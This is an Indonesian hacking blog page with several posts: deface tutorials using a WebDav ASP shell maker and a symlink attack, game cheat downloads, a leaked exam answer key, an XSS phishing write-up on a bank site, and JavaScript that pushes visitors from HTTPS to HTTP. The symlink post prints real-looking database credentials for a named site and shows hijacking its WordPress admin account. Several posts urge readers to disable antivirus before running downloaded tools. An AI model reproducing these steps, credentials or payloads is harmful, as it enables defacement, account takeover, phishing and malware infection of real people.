Social Icons

Showing posts with label Tips & Trik Lainnya. Show all posts
Showing posts with label Tips & Trik Lainnya. Show all posts

Saturday, May 28, 2016

Tutorial Deface dengan WebDav Shell Maker

Hello Sobat Scooterist^^
Langsung aja yau…mungkin deface dengan Web Dav itu deface paling bawah alias gampang.
Saya akan memberikan tutor dan link download WebDav… Berhubung kebanyakan Hacker pemula menggunakan cara ini.. Jadi tidak usah khawatir akan kerusakan website.. Karena hanya halaman index saja yang di deface…
Download Files Berikut :
Download : Rootkit
Password  : cbf
Download : Shell
*NB: Tutup antivirus anda, kalau tidak antivirus akan detect rootkit sebagai virus.
Mungkin aplikasi Hmei7 ini terdeteksi Virus Rooit atau Malware tetapi sebenarnya pada aplikasi ini tidak mengandung virus… Saya sudah menyimpan aplikasi ini sekitar 2 minggu dan tidak terjadi apa-apa pada komputer saya sebaiknya matikan antivirus sebelum membuka aplikasi ini…
Deface menggunakan aplikasi ini adalah deface dalam bentuk asp, dan shellnnya sudah berada pada aplikasi ini jadi tidak usah memerlukan shell lain sperti b473k dan c99 tidak bisa digunakan untuk ini karena shell didalam adalah shell hanya untuk website ASP.
Nih ku kasih tutor dikit mengenai aplikasi ini :
1. Jalankan software nya..
2. Pilih WebDav >> ASP Shell Maker
3. Terus Klik Add Site >> Masukkan Website Target
4. Bila Berhasil akan ada penampakan seperti ini:
5. Terus hasilnya copas pada address bar.. Maka akan ada tampilan seperti ini..
6.Cari file Index atau apa saja lah yang bisa merubah tampilan website nya, edit / upload file tersebut dengan script halaman deface. Contohnya seperti ini:
Ok.. Mungkin ini dulu yang sedikit bisa saya sharing untuk sobat semua…. Untuk selanjutnya silahkan berkreasi…..
Semoga bermanfaat….

Tuesday, May 24, 2016

Update Cheat All Game World

Hai sob ^_^ kali ini admin akan share beberapa cheat game online :)


Di website Xnonymous tersedia cheat game Social Point , Game SuperCell , Game LGR , Garena Shell dll.
Website tersebut kami buat untuk para gamer yang ingin secara instan bermain game
Jika sobat berminat silahkan kunjungi web cheat kami di sini
Silahkan anda gunakan dengan bijak, jangan berlebihan!!! Jika ada yang error/tidak work silahkan contact admin :)

Cara Deface Metode Symlink

Halo sob (^_^), kali ini saya akan berbagi cara menggunakan Symlink.
Saya anggap agan udah punya target dan sudah di pasang Backdoor/shell di web target, saya tidak akan menjelaskan caranya, karena saya anggap agan sudah bisa mencari target sendiri (^_^).

Pertama masuk ke Shell yang sudah di tanam di web target.
lalu upload Sym.php ( Digunakan untuk SYMLINK ).
Klo belum punya silahkan Download Disini Sob (^_^)



















Pada gambar di atas saya sudah upload sym.php melalui shell yang saya tanam.

Selanjutnya akses / buka symlink yang telah agan upload.


















Lalu klik user & domain & symlink.


















Terlihat banyak sekali target-target lain, dan yang akan saya jadikan target adalah thefussyeater.org lalu klik "symlink".


















Lalu kita cari confignya, dan target saya ini wordpress saya menemukan wp-config.php lalu saya klik.

Jika CMS Joomla cari saja configuration.php, jika CMS Lokomedia, cari saja di config/koneksi.php, jika CMS Balitbang cari saja di lib/config.php.


















Perhatikan baris ini :
define('DB_HOST', 'localhost');

DB NAME = thefussy_wrdp3

DB USER = thefussy_wrdp3

DB PASSWORD = CZyLRz1EuwSd

DB HOST = localhost
Diatas adalah informasi mengenai Akses Database MySQL.

Lalu setelah mendapatkan informasi username & password Database MySQL seperti diatas, kembali ke shell pertama.


















Klik koneksi MySQL.

















Lalu isi dengan data - data yang telah di peroleh pada file configurasi  diatas tadi, dan saya klik Connect.

Jika di dalam shell agan tidak ada menu Koneksi MySQL Download INI lalu Upload , akses dan login.



















Lalu, saya klik "wp_user".



















Terlihat passwordnya dalam bentuk encrypt md5, jadi kita rubah saja (^_^).
Agan buat password dalam bentuk MD5 Disini Sob (^_^).


Saya mencoba password 121212 dan setelah di enskripsi menjadi 93279e3308bdbbeed946fc965017f67a Lalu saya rubah password wp-user nya dan saya ganti dengan password saya 93279e3308bdbbeed946fc965017f67a





















Saya sudah merubah dengan 93279e3308bdbbeed946fc965017f67a dan saya klik confirm untuk menyimpan pengaturannya, dan pada pengaturan selanjutnya klik Yes.

Berarti saya akan login dengan username admin dan password 121212.
Sekarang kita coba sob (^_^). 

















Saya coba ke halaman loginwebnya http://thefussyeater.org/wp-admin

Saya login & wauuuuu, kereennn sob (^_^).

Saya berhasil masuk (^_^).


















Jika sudah seperti ini terserah anda sob, kalo pengen nanam shell silahkan, asal jangan lupa di backup file pentingnya dan jangan di rusak (^_^)

Selamat Mencoba (^_^).

Update Cheat VVIP PBGI 26 MEI 2016

Sebelum Memakai Cheat Pastikan Anda Mencoba Pada Char Tumbal Terlebih Dahulu, Jika Login 2X Aman Bisa Dipastikan Cheat Bebas Banned
Cheat 100% Bebas Virus . Jika Ada Notif AntiVirus Allow / Skip Saja Karena Cheat Aman, Tidak Mengganggu PC Sama Sekali. 100% Anti Banned XignCode kecuali dilaporkan ke Forum
Jika Anda Ragu Dengan Cheat Kami Jangan Di Gunakan , Karena Cheat Kami Di Tujukan Untuk Kesenangan Dan Hiburan Semata Bukan Untuk Merugikan Pemakai Cheat !
Fitur Cheat PBGI XNONYMOUS Hack :
1. Anti Banned
2. Anti P.I
3. Wallhack
4. Cross Hair
5. No Smoke
6. ESP Line
7. ESP Health
8. ESP Name
9. ESP Bone
10. ESP Observer
11. ESP Head
12. No Recoil
13. Ammo Kanan
14. Brust Piso
15. Fast Reload
16. Plant Bomb
17. Rapid Fire
18. Aim Bullet
19. Target (Head, Body)
20. Zombie
21. Smoke Kill
22. WallShot
23. Fake Replace [F2]
24. R-Bazoka
25. R-Smoke
26. R-Pistol [F3]
Jika Ada Masalah Dengan Cheat Nya Silahkan Komentar Dengan Sopan Di Kolom Bawah Ini Atau Bisa E-Mail Admin Ke
Phanatagama@gmail.com
Langsung saja comot di bawah ini :
Simple Hack : Link Download
Full Hack      : Link Download

Injector         : Link Download
Jika Cheat  Tidak Work Silahkan Download Jamu File Pendukung Cheat Di Bawah Ini
 Untuk Manual Inject Klik Inject Saat Loading Xigncode3
 Tutorial Cheat : 
-Matikan Antivirus
-Extrack Here Cheatnya Ke Desktop
-Buka Injection.exe (Windows Vista, 7, 8 wajib Run As Administrator)
-Pilih Manually Inject
-Browser CODING.dll
-Buka PBGI-nya
-Muncul Xigncode3 Klik Inject
-Happy Cheat ^_^

Saturday, January 30, 2016

Kunci Detik-detik SMP 2015 Matematika

Buku Detik-Detik Ujian Nasional sudah terkenal akurat dalam memprediksi bagaimana bentuk soal UN yang sebenarnya. Ini bisa dibuktikan dari beberapa soal yang terdapat dalam paket soal Tryout maupun Prediksi UN keluar dalam UN yang sebenarnya.

Oleh karena itu, buku ini sudah dipercaya oleh banyak kalangan baik guru maupun siswa. Begitu buku ini datang di sebuah toko buku, seketika itu pula buku ini ludes terjual. Saking laris manisnya sampai sebuah toko buku menyediakan tempat yang cukup luas untuk menumpuk buku Detik-detik ini.


berikut ini saya memberikan link untuk mendownlod Kunci Jawaban dan Pembahasan Detik-detik UN SMP tahun 2015 karangan penerbit Intan Pariwara untuk pelajaran Matematika :

Kunci Detik-detik SMP 2015 Matematika

Mudah-mudahan bermanfaat.

Monday, January 4, 2016

Menanam Form Login Palsu Pada Web Standard Chartered Online Banking

Lagi-lagi Bank Standard Chartered memiliki celah XSS yang cukup serius. Celah ini memungkinkan phisher untuk membuat form login palsu pada area Online Banking. Sama dengan celah-celah XSS pada umumnya, tidak ada kerusakan yang akan ditimbulkan pada sisi Standard Chartered. Hanya saja, apabila celah ini dibiarkan, tinggal menunggu waktu ada orang jahat yang memanfaatkan celah ini untuk melakukan aksi penipuan dengan berbekal penyingkat URL, jejaring sosial, email, atau instant messenger.

Contoh Hasil Form Login Palsu

{image: Standard Chatered Online Banking XSSED by SPYRO KiD}
Standard Chatered Online Banking XSSED by SPYRO KiD

POC


//E.O.F

Sunday, January 3, 2016

Protocol Redirect: Playing With Secure Sockets Layer (SSL)


Secure Sockets Layer (SSL) merupakan salah satu metode enkripsi yang telah banyak dipercaya sebagai solusi keamanan komunikasi. Paket data yang mengunakan SSL akan dienkripsi sehingga walaupun nantinya tertangkap oleh Network Sniffer, maka orang lain akan sulit untuk membaca informasi sensitif didalamnya.
Dalam berselancar, biasanya kita menggunakan protokol http:// Namun apabila komunikasi yang terjalin menggunakan SSL, protokol yang digunakan adalah https://. Biasanya ada peringatan dari browser apabila kita akan menggunakan SSL dalam berkomunikasi.
Mari kita lihat dengan menggunakan WIRESHARK mengapa dalam komunikasi sensitif banyak orang mengklaim bahwa SSL adalah pilihan tepat dan cukup secure untuk menjaga informasi sensitif yang sedang terjalin:
{image: wireshark}
Wireshark
Saya melakukan scanning, kemudian mengakses http://spyrozone.net, Berikut yang saya dapatkan dari “Follow TCP Stream” :
{image: spyrozone.net melalui protokol http}
spyrozone.net melalui protokol http
Hmm.. sniffable.. ^_^ Halaman yang saya akses bisa disusun ulang dengan mudahnya. Namun ketika saya mengakses https://spyrozone.net
{image: spyrozone.net melalui protokol https}
spyrozone.net melalui protokol https
Hmm.. sudah jelas khan kenapa dikatakan Secure ^_* Informasi yang ditangkap sulit untuk dibaca ^_^
Namun.. hanya dengan beberapa potong code JavaScript, anda dapat membuat SSL tidak berguna pada situs yang vuln terhadap Cross Site Scripting (XSS). Anda dapat melakukan redirect protokol untuk melempar user dari jalur SSL ke jalur normal dengan menginjeksikan script sederhana pada situs yang vuln terhadap XSS tersebut.. ^_^
And.. Here is the code:
Object.prototype.protocol_redirect = function(uri) {
    if(uri) {
        if(uri.indexOf('https:') !=-1) {
            u = uri;
            n = u.split(':');
            n[0] = n[0].replace('s','');
            document.location = n[0] + '://' +n[1];
        }
    } else {
        u = document.location.href;
        if(document.location.protocol == 'https:') {
            n = u.split(':');
            n[0] = n[0].replace('s','');
            document.location = n[0] + '://' +n[1];
        }
    }
};
this.protocol_redirect();
Hmm.. saya rasa ini juga merupakan salah satu alasan yang kuat kenapa begitu banyak Attacker selalu mengatakan bahwa XSS cukup mengerikan di tangan yang tepat, dan mengapa mereka selalu tertawa ketika masih ada orang yang meremehkan XSS ^_^
Keep learning and Happy hacking.. ^_*

//E.O.F